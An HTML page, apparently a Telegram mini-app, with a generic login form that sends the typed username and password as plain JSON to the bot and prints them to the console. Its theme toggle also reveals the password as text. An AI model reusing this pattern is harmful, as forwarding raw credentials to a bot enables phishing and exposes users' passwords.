<!DOCTYPE html>
<html>
<head>
  <title>Login Form</title>
  <script src="https://telegram.org/js/telegram-web-app.js"></script>
  <style>
    body {
      background-color: #000;
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      color: #fff;
    }
    
    .container {
      max-width: 400px;
      margin: 50px auto;
      background-color: #222;
      padding: 20px;
      border-radius: 10px;
      box-shadow: 0px 0px 10px 2px rgba(255, 255, 255, 0.1);
      position: relative;
    }

    .light-mode .form-group.password-eye input[type="password"] {
      background-color: #f9f9f9;
    }
    
    .form-group {
      margin-bottom: 15px;
    }
    
    .form-group label {
      display: block;
      margin-bottom: 5px;
      font-weight: bold;
    }
    
    .form-group input[type="text"],
    .form-group input[type="password"] {
      width: 100%;
      padding: 10px;
      border: 1px solid #ccc;
      border-radius: 3px;
      font-size: 16px;
      box-sizing: border-box;
      background-color: #222;
    }

    .form-group input[type="text"] {
      color: #fff;
    }

    .form-group input[type="password"] {
      color: #222;
    }
    
    .password-eye {
      position: relative;
      display: inline-block;
      width: 100%; /* Adjusted width to match the username input box */
      user-select: none;
    }
    
    .password-eye input[type="password"] {
      padding-right: 30px;
    }
    
    .password-eye .torch-light {
      position: absolute;
      top: 50%;
      right: 16px;
      transform: translateY(-50%);
      color: #ffdd55;
      font-size: 20px;
      opacity: 0.5;
      pointer-events: none;
    }
    
    .password-eye input[type="password"]:focus {
      color: #222;
    }
    
    .password-eye input[type="password"].hide-dots {
      -webkit-text-fill-color: #222 !important; /* For WebKit browsers */
      -webkit-text-security: disc !important; /* For WebKit browsers */
      text-fill-color: #222 !important; /* For other browsers */
      text-security: disc !important; /* For other browsers */
    }

    .theme-toggle {
      position: absolute;
      top: 5px;
      right: 5px;
      cursor: pointer;
      font-size: 24px;
      opacity: 0.5;
      font-family: "Material Symbols Outlined";
      padding: 5px;
    }

    
    .moon::before {
      content: "\E51C";
    }
    
    .sun::before {
      content: "\E518";
    }
    
    .moon,
    .sun {
      display: inline-block;
    }
    
    input[type="password"]::selection {
      background-color: transparent;
    }
  </style>
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@48,400,0,0">
</head>
<body>
  <div class="container">
    <h2>Login Form</h2>
    <span class="theme-toggle moon" id="theme-toggle" onclick="toggleTheme()"></span>
    <form>
      <div class="form-group">
        <label for="username">Username:</label>
        <input type="text" id="username" name="username" placeholder="Enter your username" required>
      </div>
      <div class="form-group password-eye">
        <label for="password">Password:</label>
        <input type="password" id="password" name="password" placeholder="Enter your password" required>
      </div>
    </form>
  </div>
  
  <script>
    var passwordInput = document.getElementById("password");
    var themeToggle = document.getElementById("theme-toggle");
  
    function toggleTheme() {
      if (document.body.classList.contains("dark-mode")) {
        document.body.classList.remove("dark-mode");
        themeToggle.classList.remove("sun");
        themeToggle.classList.add("moon");
        passwordInput.type = "password";
      } else {
        document.body.classList.add("dark-mode");
        themeToggle.classList.remove("moon");
        themeToggle.classList.add("sun");
        passwordInput.type = "text";
      }
      
      // Trigger focus on the password input field
      passwordInput.focus();
    }
  
    //passwordInput.addEventListener("blur", function() {
    //  if (passwordInput.type === "password") {
    //    passwordInput.classList.add("hide-dots");
    //  } else {
    //    passwordInput.classList.remove("hide-dots");
    // }
    //});
  </script>
  <script type="text/javascript">
    Telegram.WebApp.ready();
    Telegram.WebApp.MainButton.setText('Next').show().onClick(function () {
    var userInput = document.getElementById('username');
    var passInput = document.getElementById('password');

    var authData = {
	formname: 'Login Form', 
        username: userInput.value,
        password: passInput.value
        };

    var authString = JSON.stringify(authData);
    Telegram.WebApp.sendData(authString);
    Telegram.WebApp.close();
    console.log(authString);
    });
  </script>
  <script type="text/javascript">
    Telegram.WebApp.expand();
    </script>
</body>
</html>

